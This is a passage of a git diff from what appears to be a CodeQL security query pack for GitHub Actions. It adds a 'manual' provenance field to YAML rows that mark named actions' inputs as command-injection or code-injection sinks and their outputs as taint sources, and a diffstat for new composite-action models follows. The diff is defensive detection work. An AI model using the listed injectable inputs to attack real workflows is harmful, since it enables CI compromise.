a/ql/lib/ext/ros-tooling_setup-ros.model.yml b/ql/lib/ext/ros-tooling_setup-ros.model.yml index e2813105bdc9..ae3ef2e2b1b7 100644 --- a/ql/lib/ext/ros-tooling_setup-ros.model.yml +++ b/ql/lib/ext/ros-tooling_setup-ros.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ros-tooling/setup-ros", "*", "input.required-ros-distributions", "command-injection"] + - ["ros-tooling/setup-ros", "*", "input.required-ros-distributions", "command-injection", "manual"] diff --git a/ql/lib/ext/ruby_setup-ruby.model.yml b/ql/lib/ext/ruby_setup-ruby.model.yml index d6ba27a50798..079dfc1fc02b 100644 --- a/ql/lib/ext/ruby_setup-ruby.model.yml +++ b/ql/lib/ext/ruby_setup-ruby.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["ruby/setup-ruby", "*", "input.ruby-version", "output.ruby-prefix", "taint"] + - ["ruby/setup-ruby", "*", "input.ruby-version", "output.ruby-prefix", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ruby/setup-ruby", "*", "input.ruby-version", "command-injection"] + - ["ruby/setup-ruby", "*", "input.ruby-version", "command-injection", "manual"] diff --git a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml index 413f4f3058bc..19edd617c670 100644 --- a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml +++ b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["salsify/action-detect-and-tag-new-version", "*", "input.tag-template", "output.tag", "taint"] + - ["salsify/action-detect-and-tag-new-version", "*", "input.tag-template", "output.tag", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["salsify/action-detect-and-tag-new-version", "*", "input.version-command", "command-injection"] + - ["salsify/action-detect-and-tag-new-version", "*", "input.version-command", "command-injection", "manual"] diff --git a/ql/lib/ext/shallwefootball_upload-s3-action.model.yml b/ql/lib/ext/shallwefootball_upload-s3-action.model.yml index a8db7e8313e6..9f8d987c0aff 100644 --- a/ql/lib/ext/shallwefootball_upload-s3-action.model.yml +++ b/ql/lib/ext/shallwefootball_upload-s3-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["shallwefootball/upload-s3-action", "*", "input.destination_dir", "output.object_key", "taint"] + - ["shallwefootball/upload-s3-action", "*", "input.destination_dir", "output.object_key", "taint", "manual"] diff --git a/ql/lib/ext/shogo82148_actions-setup-perl.model.yml b/ql/lib/ext/shogo82148_actions-setup-perl.model.yml index d171499049aa..90a181038680 100644 --- a/ql/lib/ext/shogo82148_actions-setup-perl.model.yml +++ b/ql/lib/ext/shogo82148_actions-setup-perl.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["shogo82148/actions-setup-perl", "*", "input.working-directory", "env.PERL5LIB", "taint"] + - ["shogo82148/actions-setup-perl", "*", "input.working-directory", "env.PERL5LIB", "taint", "manual"] diff --git a/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml b/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml index 42361b203e08..fd484074f5c5 100644 --- a/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml +++ b/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["skitionek/notify-microsoft-teams", "*", "input.overwrite", "code-injection"] \ No newline at end of file + - ["skitionek/notify-microsoft-teams", "*", "input.overwrite", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/snow-actions_eclint.model.yml b/ql/lib/ext/snow-actions_eclint.model.yml index 474b36186b09..5caaea9562e1 100644 --- a/ql/lib/ext/snow-actions_eclint.model.yml +++ b/ql/lib/ext/snow-actions_eclint.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["snow-actions/eclint", "*", "input.args", "command-injection"] + - ["snow-actions/eclint", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/stackhawk_hawkscan-action.model.yml b/ql/lib/ext/stackhawk_hawkscan-action.model.yml index 73b93dbb88af..9462b8d5bbd1 100644 --- a/ql/lib/ext/stackhawk_hawkscan-action.model.yml +++ b/ql/lib/ext/stackhawk_hawkscan-action.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["stackhawk/hawkscan-action", "*", "input.workspace", "command-injection"] - - ["stackhawk/hawkscan-action", "*", "input.apiKey", "command-injection"] - - ["stackhawk/hawkscan-action", "*", "input.command", "command-injection"] - - ["stackhawk/hawkscan-action", "*", "input.args", "command-injection"] - - ["stackhawk/hawkscan-action", "*", "input.version", "command-injection"] \ No newline at end of file + - ["stackhawk/hawkscan-action", "*", "input.workspace", "command-injection", "manual"] + - ["stackhawk/hawkscan-action", "*", "input.apiKey", "command-injection", "manual"] + - ["stackhawk/hawkscan-action", "*", "input.command", "command-injection", "manual"] + - ["stackhawk/hawkscan-action", "*", "input.args", "command-injection", "manual"] + - ["stackhawk/hawkscan-action", "*", "input.version", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/step-security_harden-runner.model.yml b/ql/lib/ext/step-security_harden-runner.model.yml index 4138b97f0fb2..9b01987e1f28 100644 --- a/ql/lib/ext/step-security_harden-runner.model.yml +++ b/ql/lib/ext/step-security_harden-runner.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["step-security/harden-runner", "*", "input.allowed-endpoints", "command-injection"] + - ["step-security/harden-runner", "*", "input.allowed-endpoints", "command-injection", "manual"] diff --git a/ql/lib/ext/suisei-cn_actions-download-file.model.yml b/ql/lib/ext/suisei-cn_actions-download-file.model.yml index 4ab448b04c1a..10a3630ea0bd 100644 --- a/ql/lib/ext/suisei-cn_actions-download-file.model.yml +++ b/ql/lib/ext/suisei-cn_actions-download-file.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["suisei-cn/actions-download-file", "*", "input.filename", "output.filename", "taint"] + - ["suisei-cn/actions-download-file", "*", "input.filename", "output.filename", "taint", "manual"] diff --git a/ql/lib/ext/tibdex_backport.model.yml b/ql/lib/ext/tibdex_backport.model.yml index 1bcbac476a80..aac20afddf56 100644 --- a/ql/lib/ext/tibdex_backport.model.yml +++ b/ql/lib/ext/tibdex_backport.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["tibdex/backport", "*", "input.body_template", "code-injection"] - - ["tibdex/backport", "*", "input.head_template", "code-injection"] - - ["tibdex/backport", "*", "input.labels_template", "code-injection"] - - ["tibdex/backport", "*", "input.title_template", "code-injection"] \ No newline at end of file + - ["tibdex/backport", "*", "input.body_template", "code-injection", "manual"] + - ["tibdex/backport", "*", "input.head_template", "code-injection", "manual"] + - ["tibdex/backport", "*", "input.labels_template", "code-injection", "manual"] + - ["tibdex/backport", "*", "input.title_template", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/timheuer_base64-to-file.model.yml b/ql/lib/ext/timheuer_base64-to-file.model.yml index 299c387c81a8..8dcabd1650a6 100644 --- a/ql/lib/ext/timheuer_base64-to-file.model.yml +++ b/ql/lib/ext/timheuer_base64-to-file.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["timheuer/base64-to-file", "*", "input.fileName", "output.filePath", "taint"] - - ["timheuer/base64-to-file", "*", "input.fileDir", "output.filePath", "taint"] + - ["timheuer/base64-to-file", "*", "input.fileName", "output.filePath", "taint", "manual"] + - ["timheuer/base64-to-file", "*", "input.fileDir", "output.filePath", "taint", "manual"] diff --git a/ql/lib/ext/tj-actions_branch-names.model.yml b/ql/lib/ext/tj-actions_branch-names.model.yml index a7afc090a91f..753303b0cb3d 100644 --- a/ql/lib/ext/tj-actions_branch-names.model.yml +++ b/ql/lib/ext/tj-actions_branch-names.model.yml @@ -4,7 +4,7 @@ extensions: extensible: sourceModel data: # https://github.com/tj-actions/branch-names - - ["tj-actions/branch-names", "*", "output.current_branch", "PR current branch"] - - ["tj-actions/branch-names", "*", "output.head_ref_branch", "PR head branch"] - - ["tj-actions/branch-names", "*", "output.ref_branch", "Branch tirggering workflow run"] + - ["tj-actions/branch-names", "*", "output.current_branch", "PR current branch", "manual"] + - ["tj-actions/branch-names", "*", "output.head_ref_branch", "PR head branch", "manual"] + - ["tj-actions/branch-names", "*", "output.ref_branch", "Branch tirggering workflow run", "manual"] diff --git a/ql/lib/ext/tj-actions_changed-files.model.yml b/ql/lib/ext/tj-actions_changed-files.model.yml index 7890668fa878..fb15abce061d 100644 --- a/ql/lib/ext/tj-actions_changed-files.model.yml +++ b/ql/lib/ext/tj-actions_changed-files.model.yml @@ -3,20 +3,20 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["tj-actions/changed-files", "*", "output.added_files", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.copied_files", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.deleted_files", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.modified_files", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.renamed_files", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.type_changed_files", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.unmerged_files", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.unknown_files", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_changed_files", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.other_changed_files", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_modified_files", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.other_modified_files", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.other_deleted_files", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.modified_keys", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.changed_keys", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.added_files", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.copied_files", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.deleted_files", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.modified_files", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.renamed_files", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.type_changed_files", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.unmerged_files", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.unknown_files", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.all_changed_files", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.other_changed_files", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.all_modified_files", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.other_modified_files", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.other_deleted_files", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.modified_keys", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.changed_keys", "PR changed files", "manual"] diff --git a/ql/lib/ext/tj-actions_verify-changed-files.model.yml b/ql/lib/ext/tj-actions_verify-changed-files.model.yml index 1946b78f5fd3..8e4938368b8c 100644 --- a/ql/lib/ext/tj-actions_verify-changed-files.model.yml +++ b/ql/lib/ext/tj-actions_verify-changed-files.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["tj-actions/verify-changed-files", "*", "output.changed-files", "PR changed files"] + - ["tj-actions/verify-changed-files", "*", "output.changed-files", "PR changed files", "manual"] diff --git a/ql/lib/ext/trilom_file-changes-action.model.yml b/ql/lib/ext/trilom_file-changes-action.model.yml index 77706e266fed..61141e5f73ba 100644 --- a/ql/lib/ext/trilom_file-changes-action.model.yml +++ b/ql/lib/ext/trilom_file-changes-action.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["trilom/file-changes-action", "*", "output.files", "PR changed files"] - - ["trilom/file-changes-action", "*", "output.files_added", "PR changed files"] - - ["trilom/file-changes-action", "*", "output.files_modified", "PR changed files"] - - ["trilom/file-changes-action", "*", "output.files_removed", "PR changed files"] + - ["trilom/file-changes-action", "*", "output.files", "PR changed files", "manual"] + - ["trilom/file-changes-action", "*", "output.files_added", "PR changed files", "manual"] + - ["trilom/file-changes-action", "*", "output.files_modified", "PR changed files", "manual"] + - ["trilom/file-changes-action", "*", "output.files_removed", "PR changed files", "manual"] diff --git a/ql/lib/ext/tripss_conventional-changelog-action.model.yml b/ql/lib/ext/tripss_conventional-changelog-action.model.yml index 3072c6f54fd3..ae166b1f5154 100644 --- a/ql/lib/ext/tripss_conventional-changelog-action.model.yml +++ b/ql/lib/ext/tripss_conventional-changelog-action.model.yml @@ -3,13 +3,13 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["tripss/conventional-changelog-action", "*", "input.pre-release-identifier", "command-injection"] - - ["tripss/conventional-changelog-action", "*", "input.git-user-name", "command-injection"] - - ["tripss/conventional-changelog-action", "*", "input.git-user-email", "command-injection"] - - ["tripss/conventional-changelog-action", "*", "input.git-url", "command-injection"] - - ["tripss/conventional-changelog-action", "*", "input.github-token", "command-injection"] - - ["tripss/conventional-changelog-action", "*", "input.git-pull-method", "command-injection"] - - ["tripss/conventional-changelog-action", "*", "input.fallback-version", "command-injection"] - - ["tripss/conventional-changelog-action", "*", "input.git-message", "command-injection"] - - ["tripss/conventional-changelog-action", "*", "input.git-branch", "command-injection"] - - ["tripss/conventional-changelog-action", "*", "input.tag-prefix'", "command-injection"] \ No newline at end of file + - ["tripss/conventional-changelog-action", "*", "input.pre-release-identifier", "command-injection", "manual"] + - ["tripss/conventional-changelog-action", "*", "input.git-user-name", "command-injection", "manual"] + - ["tripss/conventional-changelog-action", "*", "input.git-user-email", "command-injection", "manual"] + - ["tripss/conventional-changelog-action", "*", "input.git-url", "command-injection", "manual"] + - ["tripss/conventional-changelog-action", "*", "input.github-token", "command-injection", "manual"] + - ["tripss/conventional-changelog-action", "*", "input.git-pull-method", "command-injection", "manual"] + - ["tripss/conventional-changelog-action", "*", "input.fallback-version", "command-injection", "manual"] + - ["tripss/conventional-changelog-action", "*", "input.git-message", "command-injection", "manual"] + - ["tripss/conventional-changelog-action", "*", "input.git-branch", "command-injection", "manual"] + - ["tripss/conventional-changelog-action", "*", "input.tag-prefix'", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/tryghost_action-deploy-theme.model.yml b/ql/lib/ext/tryghost_action-deploy-theme.model.yml index 5fe53ea3d079..a6cc68843895 100644 --- a/ql/lib/ext/tryghost_action-deploy-theme.model.yml +++ b/ql/lib/ext/tryghost_action-deploy-theme.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["tryghost/action-deploy-theme", "*", "input.theme-name", "command-injection"] - - ["tryghost/action-deploy-theme", "*", "input.exclude", "command-injection"] + - ["tryghost/action-deploy-theme", "*", "input.theme-name", "command-injection", "manual"] + - ["tryghost/action-deploy-theme", "*", "input.exclude", "command-injection", "manual"] diff --git a/ql/lib/ext/tzkhan_pr-update-action.model.yml b/ql/lib/ext/tzkhan_pr-update-action.model.yml index d4b083e14d22..c80590e49315 100644 --- a/ql/lib/ext/tzkhan_pr-update-action.model.yml +++ b/ql/lib/ext/tzkhan_pr-update-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["tzkhan/pr-update-action", "*", "output.headMatch", ""] + - ["tzkhan/pr-update-action", "*", "output.headMatch", "", "manual"] diff --git a/ql/lib/ext/veracode_veracode-sca.model.yml b/ql/lib/ext/veracode_veracode-sca.model.yml index 5e87f6c3b941..a352d6c9ff61 100644 --- a/ql/lib/ext/veracode_veracode-sca.model.yml +++ b/ql/lib/ext/veracode_veracode-sca.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["veracode/veracode-sca", "*", "input.url", "command-injection"] - - ["veracode/veracode-sca", "*", "input.path", "command-injection"] - - ["veracode/veracode-sca", "*", "input.skip-collectors", "command-injection"] - - ["veracode/veracode-sca", "*", "input.url", "command-injection"] + - ["veracode/veracode-sca", "*", "input.url", "command-injection", "manual"] + - ["veracode/veracode-sca", "*", "input.path", "command-injection", "manual"] + - ["veracode/veracode-sca", "*", "input.skip-collectors", "command-injection", "manual"] + - ["veracode/veracode-sca", "*", "input.url", "command-injection", "manual"] diff --git a/ql/lib/ext/wearerequired_lint-action.model.yml b/ql/lib/ext/wearerequired_lint-action.model.yml index dbe5d2d542dd..6ed71f182151 100644 --- a/ql/lib/ext/wearerequired_lint-action.model.yml +++ b/ql/lib/ext/wearerequired_lint-action.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["wearerequired/lint-action", "*", "input.git_name", "command-injection"] - - ["wearerequired/lint-action", "*", "input.git_email", "command-injection"] - - ["wearerequired/lint-action", "*", "input.commit_message", "command-injection"] + - ["wearerequired/lint-action", "*", "input.git_name", "command-injection", "manual"] + - ["wearerequired/lint-action", "*", "input.git_email", "command-injection", "manual"] + - ["wearerequired/lint-action", "*", "input.commit_message", "command-injection", "manual"] diff --git a/ql/lib/ext/webfactory_ssh-agent.model.yml b/ql/lib/ext/webfactory_ssh-agent.model.yml index 9ecbdb6329f5..5864c0d0ede0 100644 --- a/ql/lib/ext/webfactory_ssh-agent.model.yml +++ b/ql/lib/ext/webfactory_ssh-agent.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["webfactory/ssh-agent", "*", "input.ssh-agent-cmd", "command-injection"] - - ["webfactory/ssh-agent", "*", "input.ssh-add-cmd", "command-injection"] - - ["webfactory/ssh-agent", "*", "input.git-cmd", "command-injection"] + - ["webfactory/ssh-agent", "*", "input.ssh-agent-cmd", "command-injection", "manual"] + - ["webfactory/ssh-agent", "*", "input.ssh-add-cmd", "command-injection", "manual"] + - ["webfactory/ssh-agent", "*", "input.git-cmd", "command-injection", "manual"] diff --git a/ql/lib/ext/xt0rted_slash-command-action.model.yml b/ql/lib/ext/xt0rted_slash-command-action.model.yml index 31a1eb5bde91..2a4378d17126 100644 --- a/ql/lib/ext/xt0rted_slash-command-action.model.yml +++ b/ql/lib/ext/xt0rted_slash-command-action.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["xt0rted/slash-command-action", "*", "output.command-arguments", ""] - - ["xt0rted/slash-command-action", "*", "output.command-arguments", ""] + - ["xt0rted/slash-command-action", "*", "output.command-arguments", "", "manual"] + - ["xt0rted/slash-command-action", "*", "output.command-arguments", "", "manual"] diff --git a/ql/lib/ext/zaproxy_action-baseline.model.yml b/ql/lib/ext/zaproxy_action-baseline.model.yml index 10920eb6bf59..880b0d606da2 100644 --- a/ql/lib/ext/zaproxy_action-baseline.model.yml +++ b/ql/lib/ext/zaproxy_action-baseline.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["zaproxy/action-baseline", "*", "input.docker_name", "command-injection"] - - ["zaproxy/action-baseline", "*", "input.target", "command-injection"] - - ["zaproxy/action-baseline", "*", "input.rules_file_name", "command-injection"] - - ["zaproxy/action-baseline", "*", "input.cmd_options", "command-injection"] \ No newline at end of file + - ["zaproxy/action-baseline", "*", "input.docker_name", "command-injection", "manual"] + - ["zaproxy/action-baseline", "*", "input.target", "command-injection", "manual"] + - ["zaproxy/action-baseline", "*", "input.rules_file_name", "command-injection", "manual"] + - ["zaproxy/action-baseline", "*", "input.cmd_options", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/zaproxy_action-full-scan.model.yml b/ql/lib/ext/zaproxy_action-full-scan.model.yml index a1d49af08456..fd8172c6ca84 100644 --- a/ql/lib/ext/zaproxy_action-full-scan.model.yml +++ b/ql/lib/ext/zaproxy_action-full-scan.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["zaproxy/action-full-scan", "*", "input.docker_name", "command-injection"] - - ["zaproxy/action-full-scan", "*", "input.target", "command-injection"] - - ["zaproxy/action-full-scan", "*", "input.rules_file_name", "command-injection"] - - ["zaproxy/action-full-scan", "*", "input.cmd_options", "command-injection"] + - ["zaproxy/action-full-scan", "*", "input.docker_name", "command-injection", "manual"] + - ["zaproxy/action-full-scan", "*", "input.target", "command-injection", "manual"] + - ["zaproxy/action-full-scan", "*", "input.rules_file_name", "command-injection", "manual"] + - ["zaproxy/action-full-scan", "*", "input.cmd_options", "command-injection", "manual"] From ae84303facb7861d6d40fc994d2cd4b7f938faee Mon Sep 17 00:00:00 2001 From: jorgectf Date: Thu, 11 Apr 2024 11:25:23 +0200 Subject: [PATCH 163/707] Add models for composite actions sinks --- ...ctions_actions-runner-controller.model.yml | 14 ++++++++++++ .../composite-actions/adap_flower.model.yml | 9 ++++++++ .../agoric_agoric-sdk.model.yml | 11 ++++++++++ .../airbnb_lottie-ios.model.yml | 6 +++++ .../airbytehq_airbyte.model.yml | 7 ++++++ .../amazon-ion_ion-java.model.yml | 7 ++++++ .../composite-actions/anchore_grype.model.yml | 6 +++++ .../composite-actions/anchore_syft.model.yml | 6 +++++ .../angular_dev-infra.model.yml | 10 +++++++++ .../ansible_ansible-lint.model.yml | 7 ++++++ .../composite-actions/ansible_awx.model.yml | 7 ++++++ .../apache_arrow-datafusion.model.yml | 6 +++++ .../apache_arrow-rs.model.yml | 7 ++++++ .../composite-actions/apache_arrow.model.yml | 6 +++++ .../apache_bookkeeper.model.yml | 6 +++++ .../composite-actions/apache_brpc.model.yml | 6 +++++ .../apache_camel-k.model.yml | 17 ++++++++++++++ .../composite-actions/apache_camel.model.yml | 11 ++++++++++ .../composite-actions/apache_flink.model.yml | 10 +++++++++ .../composite-actions/apache_nuttx.model.yml | 8 +++++++ .../apache_opendal.model.yml | 9 ++++++++ .../composite-actions/apache_pekko.model.yml | 6 +++++ .../apache_pulsar-helm-chart.model.yml | 12 ++++++++++ .../apache_superset.model.yml | 6 +++++ .../appflowy-io_appflowy.model.yml | 7 ++++++ .../aptos-labs_aptos-core.model.yml | 8 +++++++ .../archivesspace_archivesspace.model.yml | 6 +++++ .../armadaproject_armada.model.yml | 6 +++++ .../composite-actions/armbian_build.model.yml | 14 ++++++++++++ .../auth0_auth0-java.model.yml | 9 ++++++++ .../auth0_auth0.net.model.yml | 8 +++++++ .../auth0_auth0.swift.model.yml | 6 +++++ .../autogluon_autogluon.model.yml | 10 +++++++++ .../composite-actions/avaiga_taipy.model.yml | 6 +++++ .../aws-amplify_amplify-cli.model.yml | 6 +++++ .../aws_amazon-vpc-cni-k8s.model.yml | 7 ++++++ .../aws_karpenter-provider-aws.model.yml | 7 ++++++ .../awslabs_amazon-eks-ami.model.yml | 12 ++++++++++ .../awslabs_aws-lambda-rust-runtime.model.yml | 6 +++++ .../azerothcore_azerothcore-wotlk.model.yml | 7 ++++++ .../azure_azure-datafactory.model.yml | 7 ++++++ .../badges_shields.model.yml | 6 +++++ .../balena-io_etcher.model.yml | 6 +++++ .../balena-os_balena-engine.model.yml | 6 +++++ .../ben-manes_caffeine.model.yml | 10 +++++++++ .../composite-actions/bokeh_bokeh.model.yml | 6 +++++ .../botpress_botpress.model.yml | 6 +++++ ...intree_braintree-android-drop-in.model.yml | 8 +++++++ .../braintree_braintree_android.model.yml | 9 ++++++++ .../broadinstitute_gatk.model.yml | 8 +++++++ .../canonical_multipass.model.yml | 7 ++++++ .../chia-network_actions.model.yml | 11 ++++++++++ .../chia-network_chia-blockchain.model.yml | 6 +++++ .../chipsalliance_chisel.model.yml | 7 ++++++ .../chocobozzz_peertube.model.yml | 7 ++++++ .../cilium_cilium-cli.model.yml | 12 ++++++++++ .../composite-actions/cilium_cilium.model.yml | 8 +++++++ .../citusdata_citus.model.yml | 8 +++++++ .../clerk_javascript.model.yml | 10 +++++++++ .../cloud-custodian_cloud-custodian.model.yml | 9 ++++++++ .../cloudflare_workers-sdk.model.yml | 6 +++++ ...cloudfoundry_cloud_controller_ng.model.yml | 6 +++++ .../composite-actions/coder_coder.model.yml | 6 +++++ .../composite-actions/coil-kt_coil.model.yml | 6 +++++ .../commaai_openpilot.model.yml | 8 +++++++ .../conan-io_conan-center-index.model.yml | 7 ++++++ .../corretto_corretto-8.model.yml | 9 ++++++++ .../cosmos_cosmos-sdk.model.yml | 6 +++++ .../composite-actions/coturn_coturn.model.yml | 6 +++++ .../crunchydata_postgres-operator.model.yml | 6 +++++ .../composite-actions/cvc5_cvc5.model.yml | 15 +++++++++++++ .../composite-actions/d2l-ai_d2l-en.model.yml | 9 ++++++++ ...build-check-deploy-gradle-action.model.yml | 12 ++++++++++ .../datadog_dd-trace-dotnet.model.yml | 10 +++++++++ .../datadog_dd-trace-go.model.yml | 9 ++++++++ .../datadog_dd-trace-js.model.yml | 7 ++++++ .../datafuselabs_databend.model.yml | 7 ++++++ .../davatorium_rofi.model.yml | 8 +++++++ .../debezium_debezium.model.yml | 6 +++++ .../defenseunicorns_zarf.model.yml | 6 +++++ ...lifiees_demarches-simplifiees.fr.model.yml | 6 +++++ ...of-veterans-affairs_vets-website.model.yml | 6 +++++ .../devexpress_devextreme.model.yml | 8 +++++++ .../diggerhq_digger.model.yml | 9 ++++++++ .../diku-dk_futhark.model.yml | 7 ++++++ .../discourse_.github.model.yml | 6 +++++ .../dnsjava_dnsjava.model.yml | 8 +++++++ .../dotintent_react-native-ble-plx.model.yml | 6 +++++ .../dotnet_docs-tools.model.yml | 6 +++++ .../dotnet_dotnet-monitor.model.yml | 6 +++++ .../dragonflydb_dragonfly.model.yml | 9 ++++++++ .../eksctl-io_eksctl.model.yml | 8 +++++++ .../elastic_apm-agent-dotnet.model.yml | 7 ++++++ .../elastic_apm-agent-java.model.yml | 10 +++++++++ .../elementor_elementor.model.yml | 13 +++++++++++ .../composite-actions/emberjs_data.model.yml | 6 +++++ .../composite-actions/emqx_emqx.model.yml | 8 +++++++ .../eonasdan_tempus-dominus.model.yml | 7 ++++++ .../composite-actions/erlang_otp.model.yml | 7 ++++++ .../esphome_esphome.model.yml | 8 +++++++ .../composite-actions/expensify_app.model.yml | 14 ++++++++++++ .../composite-actions/expo_expo.model.yml | 6 +++++ .../expo_vscode-expo.model.yml | 8 +++++++ ...xternal-secrets_external-secrets.model.yml | 7 ++++++ .../facebook_buck2.model.yml | 6 +++++ .../composite-actions/facebook_flow.model.yml | 6 +++++ .../composite-actions/facebook_yoga.model.yml | 7 ++++++ .../facebookresearch_xformers.model.yml | 10 +++++++++ .../fastly_compute-actions.model.yml | 6 +++++ .../composite-actions/felangel_bloc.model.yml | 9 ++++++++ .../firebase_firebase-ios-sdk.model.yml | 9 ++++++++ .../flaxengine_flaxengine.model.yml | 6 +++++ ...pperdevices_flipperzero-firmware.model.yml | 10 +++++++++ .../composite-actions/fluxcd_flux2.model.yml | 8 +++++++ .../forcedotcom_salesforcedx-vscode.model.yml | 6 +++++ .../fossasia_visdom.model.yml | 7 ++++++ .../freckle_stack-action.model.yml | 6 +++++ .../freeradius_freeradius-server.model.yml | 8 +++++++ .../composite-actions/gaphor_gaphor.model.yml | 7 ++++++ .../getsentry_action-release.model.yml | 6 +++++ .../github_codeql-action.model.yml | 10 +++++++++ .../composite-actions/github_ruby.model.yml | 10 +++++++++ .../gittools_gitversion.model.yml | 8 +++++++ .../go-spatial_tegola.model.yml | 7 ++++++ .../goauthentik_authentik.model.yml | 6 +++++ .../godotengine_godot.model.yml | 9 ++++++++ .../composite-actions/google_dagger.model.yml | 6 +++++ .../googleapis_java-cloud-bom.model.yml | 6 +++++ .../googleapis_sdk-platform-java.model.yml | 6 +++++ ...ooglecloudplatform_magic-modules.model.yml | 6 +++++ .../gravitational_teleport.model.yml | 10 +++++++++ .../grote_transportr.model.yml | 6 +++++ .../hashicorp_nomad.model.yml | 6 +++++ .../hashicorp_terraform.model.yml | 10 +++++++++ .../hashicorp_vault.model.yml | 7 ++++++ .../home-assistant_android.model.yml | 8 +++++++ .../homebrew_actions.model.yml | 14 ++++++++++++ ...erledger_aries-cloudagent-python.model.yml | 6 +++++ .../hyperledger_fabric-samples.model.yml | 8 +++++++ .../igniterealtime_openfire.model.yml | 8 +++++++ .../infracost_actions.model.yml | 6 +++++ ...nspektor-gadget_inspektor-gadget.model.yml | 18 +++++++++++++++ .../intel-analytics_ipex-llm.model.yml | 6 +++++ .../ionic-team_ionic-framework.model.yml | 16 ++++++++++++++ .../ionic-team_ionicons.model.yml | 14 ++++++++++++ .../ionic-team_stencil.model.yml | 11 ++++++++++ .../composite-actions/ipfs_aegir.model.yml | 9 ++++++++ .../jetbrains_jetbrainsruntime.model.yml | 6 +++++ 